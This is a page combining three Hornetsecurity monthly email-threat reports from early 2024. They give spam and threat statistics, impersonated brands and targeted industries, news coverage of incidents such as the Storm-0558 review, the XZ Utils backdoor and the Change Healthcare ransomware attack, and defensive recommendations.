Hornetsecurity is a leading global provider of next-generation cloud-based security, compliance, backup, and security awareness solutions that help companies and organisations of all sizes around the world. Its flagship product, 365 Total Protection, is the most comprehensive cloud security solution for Microsoft 365 on the market. Driven by innovation and cybersecurity excellence, Hornetsecurity is building a safer digital future and sustainable security cultures with its award-winning portfolio. Hornetsecurity operates in more than 120 countries through its international distribution network of 12,000+ channel partners and MSPs. Its premium services are used by more than 75,000 customers.
Monthly Threat Report April 2024: Impersonation Attacks, and the US CSRB’s Report on Storm-0558

Monthly Threat Report April 2024: Impersonation Attacks, and the US CSRB’s Report on Storm-0558

by | Apr 11, 2024 | Threat Report, Threat Research

Introduction

The Monthly Threat Report by Hornetsecurity brings you monthly insights into M365 security trends, email-based threats, and commentary on current events in the cybersecurity space. This edition of the Monthly Threat Report focuses on data from the month of March 2024.

Executive Summary

  • The amount of easily identifiable (and ultimately rejected) email threats has increased, while there has been a slight decrease in the amount of more targeted and sophisticated email-based threats
  • The top file-types used for the spread of malicious payloads via email were Archive files, PDFs, and HTML files.
  • Top targeted industries were Mining, Entertainment, Media, and Manufacturing
  • Most impersonated brands for the month included DHL, Facebook, Docusign, as well as targeted campaigns involving some German entities such Strato and Targobank.
  • The US Cyber Safety Review Board completed their report regarding the Microsoft Storm-0558 attack last year. the findings are not kind to Microsoft and calls on the industry to work together to help secure public cloud services.
  • The US Federal Trade Commission has stated that impersonation attacks have cost victims 1.1 BILLION USD in 2023
  • A potentially catastrophic supply chain attack in a widely used linux library looks that have been narrowly avoided
YouTube

By loading the video, you agree to YouTube's privacy policy.
Learn more

Load video

Threat Overview

Unwanted Emails By Category

The following table shows the distribution of unwanted emails per category for February 2024 compared to March 2024.

Unwanted Emails By Category

Our data for the past month shows that the amount of low effort, easily identifiable spam messages increased, while we noticed a decrease in more targeted attacks. This is indicated by the 6.1 percentage point increase in the amount of “rejected” messages, which is explained in the note below.

NOTE: As a reminder, the “Rejected” category refers to mail that Hornetsecurity services rejected during the SMTP dialog because of external characteristics, such as the sender’s identity or IP address. If a sender is already identified as compromised, the system does not proceed with further analysis. The SMTP server denies the email transfer right at the initial point of connection based on the negative reputation of the IP and the sender’s identity.

Other categories in the image are described in the table below:

Category Description
Spam These emails are unwanted and are often promotional or fraudulent. The emails are sent simultaneously to a large number of recipients.
Threat These emails contain harmful content, such as malicious attachments or links, or they are sent to commit crimes like phishing.
AdvThreat Advanced Threat Protection has detected a threat in these emails. The emails are used for illegal purposes and involve sophisticated technical means that can only be fended off using advanced dynamic procedures.
Rejected Our email server rejects these emails directly during the SMTP dialog because of external characteristics, such as the sender’s identity, and the emails are not analyzed further.
Clean These emails were free of threats and delivered

File Types Used in Email Attacks

The following table shows the distribution of file types used in email attacks throughout the data period.

Top File Types in Email Attacks

This month the top three most used file-types used in email attacks are Archive files, HTML, and PDFs. These three are commonly in the top spots largely due to the fact that they are platform agnostic and practically every OS on the planet can utilize these file types in some way. This has lead to their popularity among threat-actors.

Also noted was an observed decrease in just about every file-type category. This was with the exception of small increases in three categories:

  • Archive files (0.2 percentage point increase).
  • Disk image files (0.7 percentage point increase).
  • Script files (1.5 percentage point increase).

This data correlates with the data shown above where the amount of more advanced email attacks is currently down, and as a result, threat actors are currently less likely to attempt to attach malicious files to emails. That said, security teams should remain wary.

Industry Email Threat Index

The following table shows our Industry Email Threat Index calculated based on the number of threat emails compared to each industry’s clean emails (in median). Different organizations receive a different absolute number of emails. Thus, we calculate the percent share of threat emails from each organization’s threat and clean emails to compare organizations. We then calculate the median of these percent values for all organizations within the same industry to form the industry’s final threat score.

Industry Email Threat Index
In terms of top targeted industries, we saw a mixture of increases/decreases across all tracked sectors with the Mining, Entertainment, and Media verticals being the top three offenders. You’ll see that even though the mining industry has had a noted decrease in targeting, it still remains in the top place by a large margin currently. Organizations falling in categories near the top of the list should be aware that they are more at risk of being targeted.

Impersonated Company Brands and Organizations

The following table shows which company brands and organizations our systems detected most in impersonation attacks.

Impersonated Brands

The top most impersonated brands during the data period are DHL, Strato (German Hosting Provider), and facebook. We also observed clear campaigns involving impersonation of both Strato, and Targobank.

Also of note, facebook brand impersonation attempts have been on the rise in recent months. This is likely an attempt by certain threat actors to gain access to facebook account credentials for use in password stuffing attacks or in an attempt to help spread disinformation, which is a common tactic we see during election years. The increase in Docusign brand impersonations is easily explainable due to the fact that it’s “tax season” in many countries, and as a result more people are expected to see Docusign emails on the regular. Threat actors know this, and are looking to capitalize on the expected increase in brand visibility

Major Incidents and Industry Events

The US Cyber Safety Review Board Completes It’s Report on the Storm-0558 Breach

As we’ve covered extensively in these monthly reports and on The Security Swarm Podcast, the Storm-0558 breach was an attack on Microsoft Cloud services by Chinese Nation-State actors who were able to (somehow) get their hands on a consumer signing key, and then forge authentication tokens for access to cloud services. This attack has been heavily discussed in the industry, and Microsoft has been (seemingly) transparent about the attack chain and aftermath. This case was bad enough and led to direct impact on the US state department, which ultimately led to an investigation by the US Cyber Safety Review Board (CSRB).

The CSRB released their report on March 20th, and the news has been making the rounds in recent days. The report is extensive (34 pages). The report details the failings of Microsoft in this case, provides key findings, and provided a staggering 25 recommendations for how CSPs (Cloud Service Providers) should be prioritizing security over new features. The report clearly states:

Microsoft leadership should consider directing internal Microsoft teams to deprioritize feature developments across the company’s cloud infrastructure and product suite until substantial security improvements have been made. In all instances, security risks should be fully and appropriately assessed and addressed before new features are deployed.

This is a statement that echoes something we were discussing in a recent episode of The Security Swarm Podcast where Andy Syrewicze and Paul Schnackenburg questioned whether the industry’s current push towards innovation at all cost, is costing the larger IT community in safety. The CSRB also commented on another facet of this issue that was discussed on other episodes of the podcast – the importance of transparency from major CSPs. The report states:

The Board is troubled that Microsoft neglected to publicly correct this known error for many months. Customers (private sector and government) relied on these public representations in Microsoft’s blogs. The loss of a signing key is a serious problem, but the loss of a signing key through unknown means is far more significant because it means that the victim company does not know how its systems were infiltrated and whether the relevant vulnerabilities have been closed off. Left with the mistaken impression that Microsoft has conclusively identified the root cause of this incident, Microsoft’s customers did not have essential facts needed to make their own risk assessments about the security of Microsoft cloud environments in the wake of this intrusion.

This once again calls into question the current lack of transparency from major cloud providers where security is involved. This includes behaviors such as those outlined in the CSRB’s report as well as bad corporate practices such as late Friday night disclosures. It also highlights the critical need of independent third-party security vendors in the ecosystem to ensure that transparency is maintained at all levels of the ecosystem as well as the growing problem of single-vendor overdependence in the space.

We’ll be publishing a future podcast episode with more details on this topic.

Impersonation Scams top 1.1 Billion USD in Damage in 2023

As an industry we spend so much time discussing ransomware and supply-chain attacks that we often don’t spend as much time discussing other attack types, such as impersonation scams. In fact, According to the US Federal Trade Commission (FTC), “reported” impersonation scams topped 1.1 billion USD. This is a shocking statistic in and of itself, but pair that with this quote directly from the FTC:

In 2023, data from the FTC alone show more than 330,000 reports of business impersonation scams and nearly 160,000 reports of government impersonation scams. That amounts to nearly half the frauds reported directly to the agency.

Nearly HALF of the fraud reported to the agency in 2023 could be classified as impersonation scams. This trend is likely to continue in the coming years as new “Phishing Resistant” technologies like passkeys hit the mainstream causing passwords to be less of a target. Threat-actors can use impersonation scams for far more than just password and token theft. The can be used for social engineering, payment redirection scams, business email compromise, and more. This is certainly a problem that the industry will need to keep an eye on in the coming months and years.

Backdoor found in Open Source XZ Utils

The industry is always on the lookout for the next bad supply chain attack. A chance investigation by a Microsoft software engineer may have already thwarted it. CVE-2024-3094 is a malicious software injection in xz versions 5.6.0 and 5.6.1 that could potentially allow an attacker to break SSH authentication and gain unauthorized access to a target system. It has a CVSS Score of 10, and the issue impacts certain versions of Fedora Linux as well as some Debian (SID) distributions.

What’s so fascinating about this case is that it appears on the surface that someone maintained xz for a long period of time with the intent to eventually introduce a backdoor. The malicious code that is injected in this case appears to be difficult to reverse-engineer, but more information will undoubtedly come to light in the coming days.

Predictions for the Coming Months

  • Financial and document verification (like docusign) services will continue to see an increase in brand impersonation attempts in the coming days. Once tax season is complete (particularly in the US), it’s likely that threat actors will pivot to other methods and brands.
  • The industry will react to the CSRB’s report on the Storm-0558 breach, while the information could potentially drive policy change in the US government where cloud services are concerned.
  • Given the recent findings with the XZ Utils supply chain attack, open source software will get more scrutiny than it has to date as we all become increasingly aware of how dependent we are FOSS.

Expert Commentary from Hornetsecurity

We asked some of our internal experts about the news from this month. We have posted their responses below!

From Andy Syrewicze, Security Evangelist, on the CSRB’s report regarding Storm-0558:

As public cloud services (like Azure and M365) become more critical to the everyday lives of people around the world, we get closer to inevitable new regulations from governing bodies. In the CSRB’s report, one interesting thing that stands out is the board’s seeming admission that public cloud is deemed as “critical infrastructure”. With this designation comes increased scrutiny from governments and the eventual implementation of some much-needed regulation. In my opinion, some additional guardrails need to be put in place for public cloud where security is concerned, and the critical infrastructure designation indicates that the spectre of regulation on the technology sector is looming larger every day.  

From Michael Posey, Lead Channel Sales Engineer, on Impersonation Attacks:

With the “CONSERVATIVE” estimate from the FTC of $1.1 Billion dollars lost to impersonation attacks in 2023, it continues to show that as IT professionals we need to be more diligent in protecting our users.  While many will say that the end user is the weakest link, with proper security awareness training, testing, and education, they can also become your biggest asset in protecting your business.  Along with proper education, helping to establish internal processes for leveraged BEC targets such as payment processes can also help to reinforce good behaviors that could be subject to many types of BEC/impersonation attacks.

Monthly Recommendations from the Hornetsecurity Security Lab

  • March 31st was World Backup Day! If you haven’t checked in on your data protection plan lately, this is a good time to do so.
  • If you use any of the affected linux distributions in your infrastructure, make sure they are not affected by the XZ utils vulnerability listed above.
  • Take the time to educate your end-users on the dangers of impersonation attacks. A trusted security awareness training vendor can help with this!

About Hornetsecurity

Hornetsecurity is a leading global provider of next-generation cloud-based security, compliance, backup, and security awareness solutions that help companies and organisations of all sizes around the world. Its flagship product, 365 Total Protection, is the most comprehensive cloud security solution for Microsoft 365 on the market. Driven by innovation and cybersecurity excellence, Hornetsecurity is building a safer digital future and sustainable security cultures with its award-winning portfolio. Hornetsecurity operates in more than 120 countries through its international distribution network of 12,000+ channel partners and MSPs. Its premium services are used by more than 75,000 customers.

Monthly Threat Report March 2024: A Busy Cybersecurity News Cycle with High-Impact Events

Monthly Threat Report March 2024: A Busy Cybersecurity News Cycle with High-Impact Events

by | Mar 14, 2024 | Threat Report, Threat Research

Introduction

The Monthly Threat Report by Hornetsecurity brings you monthly insights into M365 security trends, email-based threats, and commentary on current events in the cybersecurity space. This edition of the Monthly Threat Report focuses on data from the month of February.

Executive Summary

  • There was a very slight decrease in the amount of email threats this month. That said, the email security landscape remains dangerous.
  • PDF, HTML, and Archive files were the top three most used file types in email for the delivery of malicious payloads during the data period.
  • Mining, Manufacturing, and Media organizations were the most targeted industry verticals during the last month, according to our data.
  • Top impersonated brands in email attacks during this data period were Fedex, DHL, and Facebook.
  • The well known Lockbit ransomware group was heavily impacted by international law enforcement, and has seemingly made a return days later. It remains to be seen if the group is still as impactful as before the law enforcement crackdown.
  • A critical CVSS 10 vulnerability in the popular MSP tool ScreenConnect from Connectwise is already seeing exploit in the wild. An URGENTLY needed patch is available for those organizations running ScreenConnect On-Prem
  • A ransomware attack on Optum/Change Healthcare has brought patient healthcare services within the US to a grinding halt.
YouTube

By loading the video, you agree to YouTube's privacy policy.
Learn more

Load video

Threat Overview

Unwanted Emails By Category

The following table shows the distribution of unwanted emails per category for February 2024​ compared to January 2024.
Unwanted Emails By Category

Overall there was little change in the overall threat-landscape during this data period when compared with last month. Overall threats are slightly down, but the danger level of the email security ecosystem remains at a high level.

NOTE: As a reminder, the “Rejected” category refers to mail that Hornetsecurity services rejected during the SMTP dialog because of external characteristics, such as the sender’s identity or IP address. If a sender is already identified as compromised, the system does not proceed with further analysis. The SMTP server denies the email transfer right at the initial point of connection based on the negative reputation of the IP and the sender’s identity.

Other categories in the image are described in the table below:

Category Description
Spam These emails are unwanted and are often promotional or fraudulent. The emails are sent simultaneously to a large number of recipients.
Threat These emails contain harmful content, such as malicious attachments or links, or they are sent to commit crimes like phishing.
AdvThreat Advanced Threat Protection has detected a threat in these emails. The emails are used for illegal purposes and involve sophisticated technical means that can only be fended off using advanced dynamic procedures.
Rejected Our email server rejects these emails directly during the SMTP dialog because of external characteristics, such as the sender’s identity, and the emails are not analyzed further.
Clean These emails were free of threats and delivered

File Types Used in Email Attacks

The following table shows the distribution of file types used in email attacks throughout the data period.

Top File Types in Email Attacks

​Threat actors notably use email attachments as one possible method to get their malicious payload on an end-user’s machine. Thus, this is an important metric that we track from month to month which provides insight into threat trends.

During this data period we observed a significant increase in the amount of malicious PDF files, and archive files. These are two file types that are adaptable and available to open on just about every platform on the planet, which drives their popularity amongst attackers. We also observed an increase in the amount of executable files as well. That all said, PDF, HTML, and Archive files remain in the top three slots during this data period.

Industry Email Threat Index

The following table shows our Industry Email Threat Index calculated based on the number of threat emails compared to each industry’s clean emails (in median). Different organizations receive a different absolute number of emails. Thus, we calculate the percent share of threat emails from each organization’s threat and clean emails to compare organizations. We then calculate the median of these percent values for all organizations within the same industry to form the industry’s final threat score.

Industry Email Threat Index
The Mining, Manufacturing, and Media verticals remain in the top three slots this month as the most targeted industries. We see the media industry as being heavily targeted in the coming year as threat actors will look to spread disinformation with large elections coming up within the next 10 months. Manufacturing and Mining continue to be a frequent target due to the fact that many organizations in these verticals have enough capital that they’re an enticing target. Additionally, there is a large subset of these organizations that don’t operate in heavily regulated sectors, and as a result are unlikely to have increased budgets for stronger security measures.

Impersonated Company Brands and Organizations

The following table shows which company brands and organizations our systems detected most in impersonation attacks.

Impersonated Brands

​Fedex, DHL, and Facebook were the top 3 most impersonated brands in email attacks during the data period for this report. For DHL, and Fedex, it’s quite common to see shipping brands high on the list of brand impersonation attempts simply due to the fact that there is a high volume of emails associated with both of these brands. This includes shipping notices, delivery notifications, etc. That said, we did see a noted decrease in these occurrences during the last month. Facebook, along with Amazon saw noted increases in brand impersonation attempts.

Also of note are the small increases in brand impersonation attempts for Mastercard, Paypal, and DocuSign. This is common as we approach tax season for some countries, including the US.

Major Incidents and Industry Events

The Takedown and Reemergence of Lockbit

The well known ransomware group Lockbit was heavily disrupted by international law enforcement agencies during the month of February. Multiple known Lockbit associates are in custody and as a part of this effort, law enforcement came into the possession of more than 1000 decryption keys. These keys will potentially help victims of the group recover impacted data.

While this was good news, days afterwards things took a turn. It appears that Lockbit has already re-emerged with new servers and new encryptors. It remains to be seen whether this group has been severely impacted or if they’ve simply shifted operations elsewhere in light of recent law enforcement actions.

CVSS 10 ConnectWise ScreenConnect Vulnerability

The industry is prepping for potentially large supply chain attack as security and IT teams race to patch a critical CVSS 10 bug in Connectwise ScreenConnect, which is a popular remote access software primarily used by managed service providers. CVE-2024-1709 is a easily exploited remote authentication bypass bug that showed signs of use in the wild quickly after the news became public. Thankfully, a fix has been released for those organizations running ScreenConnect on-prem, while those organization using the cloud-hosted version are already remediated.

This issue brings to light the question of whether it’s a good security practice to include remote access software on every managed endpoint. While the MSP model leans on remote support capabilities heavily we’ve seen time and again how supply chain attacks can have a domino effect on the entire industry when applications such as ScreenConnect are impacted. It’s likely we haven’t heard the last of the news regarding this incident.

Change Healthcare / Optum Cyberattack

One of the biggest news stories to hit in the last month was the ransomware attack on Optum / Change Healthcare, a subsidiary of UnitedHealth by the BlackCat Ransomware Gang. The attack has left one of the largest US healthcare payment and processing organizations frozen for more than a week now, impacting healthcare in the US, and preventing patients from filling much needed prescriptions. The attack includes the theft of 6TBs of sensitive healthcare data, and it even appears that UnitedHealth may have paid a $22 Million USD ransom to get things back up and running.

While this seems to be your standard ransomware attack with the initial reports stating the breach stemmed from the above mentioned ScreenConnect Vulnerability (claims now debunked), it was far from from the standard ransomware attack in it’s impact. In fact, this attack could be seen as something of an escalation to the scale of the Colonial Pipeline ransomware attack some years ago. It’s an escalation in the fact that instead of just a monetary or reputation impact, the impact of this attack has a clear and present impact on the healthcare wellbeing of people. It’s not a stretch to say that if it hasn’t happened yet, we’re likely to see patient deaths in relation to this attack due to a loss of access to medication for some patients.

This attack has also had the effect of highlighting some key failure points within the US healthcare system. If the temporary absence of one organization has a ripple effect throughout the entirety of the US health system, then that is what we would call in the tech world – “A single point of failure”. This has lead to a joint #stopransomware advisory from CISA, the FBI, and the US Dept. of Health and Human Services (HHS). Whether this will be enough to shock the US healthcare industry to action remains to be seen.

Finally the story get’s weirder in that the alleged group (BlackCat) behind the attack appears to have short-changed one of the affiliate “Partner” groups that helped launch the attack and now appears to be pretending that they’ve been shut down by “the feds”. It appears BlackCat has taken their payday and run for now.

Further applicable updates to this situation in next month’s report.

Predictions for the Coming Months

  • Brand Impersonations for services like DocuSign are likely to increase moving into the Tax Season in the US.
  • The Connectwise ScreenConnect Vulnerability will have a domino effect throughout the industry. Int he coming months and weeks we’re going to see a number of breached organizations impacted by this vulnerability.
  • Further info will come out regarding the Optum/Change Healthcare breach, hopefully leading to some positive change in the healthcare system with regards to security posture and single points of failure.

Expert Commentary from Hornetsecurity

We asked some of our internal experts about the news from this month. We have posted their responses below!

From Andy Syrewicze, Security Evangelist, on The Optum / Change Healthcare Breach: The situation with Change Healthcare is one of those cases where it becomes really clear that issues with our digital estates can have a very real and severe impact on human life. Yes, there’s no denying that the financial and reputation losses we see in your average ransomware attack are bad, but when I look at this attack, and the direct impact it has had on human wellbeing, it’s an entirely different scale. When the impact from an attack is the potential loss of life (due to loss of access to medication and health services in this case), the burden of defensive security starts to feel quite heavy. We can only hope that our lawmakers, executive leadership teams, and society will provide the resources necessary to fight this escalation in the future.
From Matt Frye, Head of Presales and Education, on the Seeming Ease of Recent Attacks: The ease of attacks is what has hit me in recent months, not only the availability of tools on the public internet, but also the SaaS availability of attack methods, (which is not new), These are a growing concern. The sheer amount of monthly data breaches shows that the arms race is escalating, and only by implementing a comprehensive cybersecurity strategy, alongside a comprehensive BCP can businesses help to mitigate the risks.

Monthly Recommendations from the Hornetsecurity Security Lab

  • If you’re organization uses the On-Prem version of ScreenConnect from Connectwise, you’re URGENTLY advised to apply the latest update ASAP. Info can be found HERE.
  • The high profile ransomware attack by BlackCat this month is a good reminder to reassess you disaster recovery plan if you haven’t in some time. Make sure to run though a full recovery test and insure that you’re protecting your backups from ransomware using a feature such as immutable storage.

About Hornetsecurity

Hornetsecurity is a leading global provider of next-generation cloud-based security, compliance, backup, and security awareness solutions that help companies and organizations of all sizes around the world. Its flagship product, 365 Total Protection, is the most comprehensive cloud security solution for Microsoft 365 on the market. Driven by innovation and cybersecurity excellence, Hornetsecurity is building a safer digital future and sustainable security cultures with its award-winning portfolio. Hornetsecurity operates through its international distribution network of 12,000+ channel partners and MSPs. Its premium services are used by more than 75,000 customers.
Monthly Threat Report February 2024: A Month for Breaches and Ransomware

Monthly Threat Report February 2024: A Month for Breaches and Ransomware

by | Feb 14, 2024 | Threat Report, Threat Research

Introduction

The Monthly Threat Report by Hornetsecurity brings you monthly insights into M365 security trends, email-based threats, and commentary on current events in the cybersecurity space. This edition of the Monthly Threat Report focuses on data gathered from the month of January.

Executive Summary

  • Low-effort – high-volume email attacks continue to abate, while more targeted complex email attacks are on the rise.
  • There has been a near universal increase in the use of malicious file attachments, likely driven by the noted increase in more complex attacks.
  • HTML, PDF, and Archive files were the top 3 most used file types for malicious payloads over the data period.
  • Most targeted industries for the month of January were Mining, Media, and Manufacturing, with the Research industry coming in at a VERY close 4th place.
  • FedEx was the single most impersonated brand during this month’s report, while we also saw notable increases in brand impersonation for both Amazon and Facebook.
  • The threat actor group dubbed “Midnight Blizzard” by Microsoft was able to access and ex-filtrate Microsoft executive team emails. The industry has been reacting with some questioning Microsoft’s response to the breach.
  • Remote Access Provider AnyDesk has reported a breach that led to the theft of code signing keys. Customers need to apply the latest patches ASAP to ensure the continued safe operation of the application.
  • Johnson Controls fell victim to a significant ransomware attack with costs to recover totaling $27 Million USD.
  • The Midnight Blizzard breach of Microsoft highlights the dangers of malicious OAuth applications and it’s recommended that system admins review their currently used OAuth apps in M365 as well as the settings associated with who is able to approve OAuth apps within the environment.
  • M365 users looking to enable Co-Pilot for the first time are urged to review permissions within their M365 tenant (including for SharePoint Online, Teams, and OneDrive for Business) before enabling the feature. The ease with which Co-Pilot can surface information could lead to potential data leaks within the company in the presence of permission misconfiguration.
YouTube

By loading the video, you agree to YouTube's privacy policy.
Learn more

Load video

Threat Overview

Unwanted Emails By Category

The following table shows the distribution of unwanted emails per category for December 2023 compared to January 2024.

Unwanted Emails by Category

Our data from this data period continues the expected trend of the overall number of email attacks decreasing after the holiday season. That said, the number of targeted email attacks (those classified as “Threats” and “AdvThreats”) saw a slight increase for the month. This is indicative of the fact that with the holidays over, threat-actors are relying less on low-effort, high-volume email attacks (typically classified as “Rejected” in our data) and have moved to more targeted campaigns.

NOTE: As a reminder, the “Rejected” category refers to mail that Hornetsecurity services rejected during the SMTP dialog because of external characteristics, such as the sender’s identity or IP address. If a sender is already identified as compromised, the system does not proceed with further analysis. The SMTP server denies the email transfer right at the initial point of connection based on the negative reputation of the IP and the sender’s identity.

Other categories in the image are described in the table below:

Category Description
Spam These emails are unwanted and are often promotional or fraudulent. The emails are sent simultaneously to a large number of recipients.
Threat These emails contain harmful content, such as malicious attachments or links, or they are sent to commit crimes like phishing.
AdvThreat Advanced Threat Protection has detected a threat in these emails. The emails are used for illegal purposes and involve sophisticated technical means that can only be fended off using advanced dynamic procedures.
Rejected Our email server rejects these emails directly during the SMTP dialog because of external characteristics, such as the sender’s identity, and the emails are not analyzed further.
Clean These emails were free of threats and delivered

File Types Used in Email Attacks

The following table shows the distribution of file types used in email attacks throughout the data period.

File Types Used in Attacks

Along with the increase in targeted attacks, we’ve also seen an increase in the use of HTML, PDF, and Archive files for the delivery of malicious payloads. Targeted attacks are often more complex, with the attacker looking to more complex methods, including malicious attachments. With that in mind, it’s not surprising to see an increase in the use of malicious attachments when we see an increase in more advanced threats during the same data period.

Industry Email Threat Index

The following table shows our Industry Email Threat Index calculated based on the number of threat emails compared to each industry’s clean emails (in median). Different organizations receive a different absolute number of emails. Thus, we calculate the percent share of threat emails from each organization’s threat and clean emails to compare organizations. We then calculate the median of these percentage values for all organizations within the same industry to form the industry’s final threat score.

Industry Email Threat Index

Our data for this month has shown that some industries have seen an increase in the amount of malicious/unwanted email vs clean emails. The Mining, Media, and Manufacturing industries topped the list this month, with the research industry in a very close 4th place. The core story that the data shows this month, is that despite a decrease in overall email threat volume, the email security landscape remains dangerous.

Impersonated Company Brands and Organizations

The following table shows which company brands and organizations our systems detected most in impersonation attacks.

Impersonated Brands

In terms of top impersonated brands, we have some interesting changes this month when compared with last month’s report. The shipping company DHL was long the topmost impersonated brand, but a recent impersonation campaign involving FedEx has seen the number of FedEx brand impersonation emails skyrocket. In other changes, Facebook and Amazon saw notable impersonation increases, while Mastercard saw a decrease during this data period, likely due to the end of the holiday season. Also worth noting is the slight increase in DocuSign brand impersonations. As tax season nears in the US, threat actors know that more eyes will be on DocuSign emails in the coming months and threat actors are pivoting predictably.

Major Incidents and Industry Events

Midnight Blizzard

According to this MSRC blog post, Microsoft detected a nation-state attack on its corporate systems on January 12th, 2024. The threat actor was identified as the Russian State-Sponsored actor Nobelium and given the code name “Midnight Blizzard”. In a notice providing a bit more detail on the attack, Microsoft states:

Midnight Blizzard utilized password spray attacks that successfully compromised a legacy, non-production test tenant account that did not have multifactor authentication (MFA) enabled.

This statement has brought up a number of questions for security professionals over the past couple of days.

  1. Why was this “Legacy, Non-Production Test Tenant” still being used?
  2. Why was MFA not enforced on this tenant leading it to be compromised by a password spray attack?
  3. Why did this test tenant have any rights to the Microsoft corporate tenant?
  4. How did internal red teaming processes NOT discover the linkage between the two tenants?
  5. How did Midnight Blizzard accomplish infiltration from the “Test Tenant” to the corporate network?

We at least got an answer to one of these four questions later in the same article:

Midnight Blizzard leveraged their initial access to identify and compromise a legacy test OAuth application that had elevated access to the Microsoft corporate environment. The actor created additional malicious OAuth applications. They created a new user account to grant consent in the Microsoft corporate environment to the actor controlled malicious OAuth applications. The threat actor then used the legacy test OAuth application to grant them the Office 365 Exchange Online full_access_as_app role, which allows access to mailboxes.

This attack method highlights the risk of OAuth applications that we’ve talked about here at Hornetsecurity, including the podcast episode embedded below. Microsoft themselves have even cited the risk posed by malicious and uncontrolled OAuth apps but seems to have fallen victim themselves in this case.

Ultimately this incident has led to the ex-filtration of Microsoft Executive team emails, and there are those in the security community that are speculating that the blast radius will become larger in the coming days. The possibility of a proper cultural shift in security at Microsoft seems to be woefully needed.

The Security Swarm Podcast – The Dangers of Malicious OAuth Applications

YouTube

By loading the video, you agree to YouTube's privacy policy.
Learn more

Load video

AnyDesk Breach

Popular Remote Access solution creator AnyDesk has also experienced a major breach. According to an article from Bleeping Computer, this breach led to the theft of source code and private code signing keys. In their official statement AnyDesk stated that situation is under control and that the application is safe to use with the latest update which provides an updated code signing certificate. AnyDesk claims that no passwords were stolen as part of the attack but is recommending that AnyDesk users change passwords if they have not done so already.

This incident highlights the fact that any and all IT toolkits are under attack by threat actors in an attempt to pull off another impactful supply chain attack like the Solarwinds supply chain attack years ago. It’s also worth highlighting the fact that source code was stolen in this incident. With this in mind it’s feasible we could see other AnyDesk targeted attacks in the coming days once threat-actors have a chance to look over code.

Johnson Controls Ransomware Attack Cost the Company $27 Million

The cost associated with ransomware attacks continue to rise. So, it’s sadly becoming more common that we see successful ransomware attacks associated with an eye-watering dollar amount. The good news (if there is any to be had in this story) is that $27 Million USD was not used for paying a ransom. According to reports on the web, the $27 Million was used to restore affected systems while also taking cyber insurance payouts and external cybersecurity professional services into account.

This story was worth including in this month’s report for one simple reason. So often the monetary damage associated with a ransomware incident is attributed to a ransom payout. So often the astronomical cost of a ransomware incident is caused by the mere act of having to address the damage of the attack. This is one of the reasons that cyber insurance has become so expensive in the past couple of years. It is EXPENSIVE to deal with an extensive and targeted ransomware attack. A fact that far too many organizations realize once it’s too late.

Predictions for the Coming Months

  • With the holiday season well behind us now, we’re likely to see a return to “business as usual” for threat actors. That said, with tax season coming up in the US we’ll likely see attackers make a more targeted effort to inject themselves into the tax season to capitalize on the exchange of Monday and sensitive info.
  • We expect the fallout of this most recent Microsoft breach to become clearer in the coming days. As that process plays out, more details will emerge about threat-actor activities leading to the breach, as well as how other entities have been impacted as a part of this incident.
  • Co-Pilot for Microsoft 365 has been released and provides tremendous capabilities in surfacing stored M365 data to end users in prompts. We’re likely to see emerging cases where misconfigured permissions in SharePoint Online, Teams, and OneDrive for Business lead to the accidental exposure of data within organizations using Co-Pilot for the first time, raising the concern of insider threats.

Expert Commentary from Hornetsecurity

We asked some of our internal experts about the news from this month. We have posted their responses below!

From Andy Syrewicze, Security Evangelist, on Microsoft’s Security Culture:

I want to start by saying that I’m often the first to give the benefit of the doubt in these situations – especially so with Microsoft due to my involvement with the Microsoft MVP program over the years. However, the recent breach of Microsoft executive emails by Midnight Blizzard paired with other recent security lapses such as that caused by Storm-0558, really brings the security culture at Microsoft into question. There have been repeated security issues at Microsoft over the past several years now and the community has been waiting for clear acknowledgement that there is a systemic problem to be solved. While the SFI (Secure Future Initiative) is a step in the right direction, it still lacks the impact of the trustworthy computing memo that came directly from then CEO Bill Gates some 20+ years ago. Time will tell if the SFI has the same level of impact within the organization.

From Yvonne Bernard, CTO Hornetsecurity on Copilot:

Walled-off generative AI like Copilot is the often searched for possibility to enhance productivity with a well-defined training data scope. Nearly every business I am talking to nowadays is currently testing it. I believe this is just the beginning and future applications are endless to help employees and companies work more efficient. However, the risk of misconfiguration, hacked accounts etc is probably not in everyone’s mind yet so I strongly advice to invest into employee training on AI and data protection and the definition of proper AI policies prior to rollout.

Monthly Recommendations from the Hornetsecurity Security Lab

  • The Midnight Blizzard breach shows us that now is a good time to re-evaluate your current list of OAuth applications within your M365 environment. Remove any apps that your organization no longer uses and verify that the users allowed to approve OAuth applications are tightly controlled and configured for least possible access, given business needs.
  • If you use AnyDesk within your organization, make a plan to apply the latest patches ASAP if you have not already done so.
  • If you plan on enabling Co-Pilot for M365 within your M365 environment discuss and make a plan around the potential governance and data safety issues that this new product may surface. If you’re looking for an easy solution to this problem, a trusted permissions management tool like 365 Permission Manager can help.

About Hornetsecurity

Hornetsecurity is a leading global provider of next-generation cloud-based security, compliance, backup, and security awareness solutions that help companies and organizations of all sizes around the world. Its flagship product, 365 Total Protection, is the most comprehensive cloud security solution for Microsoft 365 on the market. Driven by innovation and cybersecurity excellence, Hornetsecurity is building a safer digital future and sustainable security cultures with its award-winning portfolio. Hornetsecurity operates in more than 30 countries through its international distribution network of 8,000+ channel partners and MSPs. Its premium services are used by more than 50,000 customers.